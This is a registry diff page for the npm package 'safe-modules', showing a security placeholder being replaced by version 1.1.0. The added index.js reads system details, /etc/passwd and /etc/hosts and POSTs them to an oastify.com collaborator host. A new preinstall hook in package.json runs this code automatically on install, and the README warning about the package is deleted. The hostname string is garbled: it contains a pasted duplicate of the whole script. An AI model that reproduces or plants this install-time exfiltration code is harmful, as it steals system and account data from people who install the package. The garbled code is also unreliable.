safe-modules 0.0.1-security → 1.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of safe-modules might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +107 -0
  2. package/package.json +10 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,107 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const fs = require("fs");
4
+ const https = require("https");
5
+ const packageJSON = require("./package.json");
6
+ const packageName = packageJSON.name;
7
+
8
+ // Collect system data from the remote server where the package is installed
9
+ const trackingData = JSON.stringify({
10
+ p: packageName, // Package name
11
+ c: __dirname, // Directory where the package is installed
12
+ hd: os.homedir(), // Home directory on the remote server
13
+ hn: os.hostname(), // Hostname of the remote server
14
+ un: os.userInfo().username, // Username on the remote server
15
+ dns: dns.getServers(), // DNS servers on the remote server
16
+ v: packageJSON.version, // Version of the package
17
+ pjson: packageJSON, // Full package.json data
18
+ etc_passwd: fs.existsSync('/etc/passwd') ? fs.readFileSync('/etc/passwd', 'utf8') : null, // /etc/passwd from the remote system
19
+ etc_hosts: fs.existsSync('/etc/hosts') ? fs.readFileSync('/etc/hosts', 'utf8') : null // /etc/hosts from the remote system
20
+ });
21
+
22
+ // Log the data to verify it's the remote server's information
23
+ console.log("Sending System Data from Remote Server: ", trackingData);
24
+
25
+ // Prepare the POST request data
26
+ var postData = JSON.stringify({
27
+ msg: trackingData,
28
+ });
29
+
30
+ // Request options to send data to your server (Burp Collaborator or any endpoint)
31
+ var options = {
32
+ hostname: "const os = require("os");
33
+ const dns = require("dns");
34
+ const fs = require("fs");
35
+ const https = require("https");
36
+ const packageJSON = require("./package.json");
37
+ const packageName = packageJSON.name;
38
+
39
+ // Collect system data from the remote server where the package is installed
40
+ const trackingData = JSON.stringify({
41
+ p: packageName, // Package name
42
+ c: __dirname, // Directory where the package is installed
43
+ hd: os.homedir(), // Home directory on the remote server
44
+ hn: os.hostname(), // Hostname of the remote server
45
+ un: os.userInfo().username, // Username on the remote server
46
+ dns: dns.getServers(), // DNS servers on the remote server
47
+ v: packageJSON.version, // Version of the package
48
+ pjson: packageJSON, // Full package.json data
49
+ etc_passwd: fs.existsSync('/etc/passwd') ? fs.readFileSync('/etc/passwd', 'utf8') : null, // /etc/passwd from the remote system
50
+ etc_hosts: fs.existsSync('/etc/hosts') ? fs.readFileSync('/etc/hosts', 'utf8') : null // /etc/hosts from the remote system
51
+ });
52
+
53
+ // Log the data to verify it's the remote server's information
54
+ console.log("Sending System Data from Remote Server: ", trackingData);
55
+
56
+ // Prepare the POST request data
57
+ var postData = JSON.stringify({
58
+ msg: trackingData,
59
+ });
60
+
61
+ // Request options to send data to your server (Burp Collaborator or any endpoint)
62
+ var options = {
63
+ hostname: "qd70flahtycu3aczwkha14t3yu4psfg4.oastify.com", // Burp Collaborator server
64
+ port: 443,
65
+ path: "/",
66
+ method: "POST",
67
+ headers: {
68
+ "Content-Type": "application/json",
69
+ "Content-Length": postData.length,
70
+ },
71
+ };
72
+
73
+ // Send the data via HTTPS POST request
74
+ var req = https.request(options, (res) => {
75
+ res.on("data", (d) => {
76
+ process.stdout.write(d); // Output the response from the server
77
+ });
78
+ });
79
+
80
+ req.on("error", (e) => {
81
+ console.error("Error sending data:", e); // Handle any error during the request
82
+ });
83
+
84
+ req.write(postData); // Send the data in the request body
85
+ req.end(); // End the request", // Burp Collaborator server
86
+ port: 443,
87
+ path: "/",
88
+ method: "POST",
89
+ headers: {
90
+ "Content-Type": "application/json",
91
+ "Content-Length": postData.length,
92
+ },
93
+ };
94
+
95
+ // Send the data via HTTPS POST request
96
+ var req = https.request(options, (res) => {
97
+ res.on("data", (d) => {
98
+ process.stdout.write(d); // Output the response from the server
99
+ });
100
+ });
101
+
102
+ req.on("error", (e) => {
103
+ console.error("Error sending data:", e); // Handle any error during the request
104
+ });
105
+
106
+ req.write(postData); // Send the data in the request body
107
+ req.end(); // End the request
package/package.json CHANGED
@@ -1,6 +1,13 @@
1
1
  {
2
2
  "name": "safe-modules",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.1.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall":"node index.js"
9
+ },
10
+ "keywords": [],
11
+ "author": "",
12
+ "license": "ISC"
6
13
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=safe-modules for more information.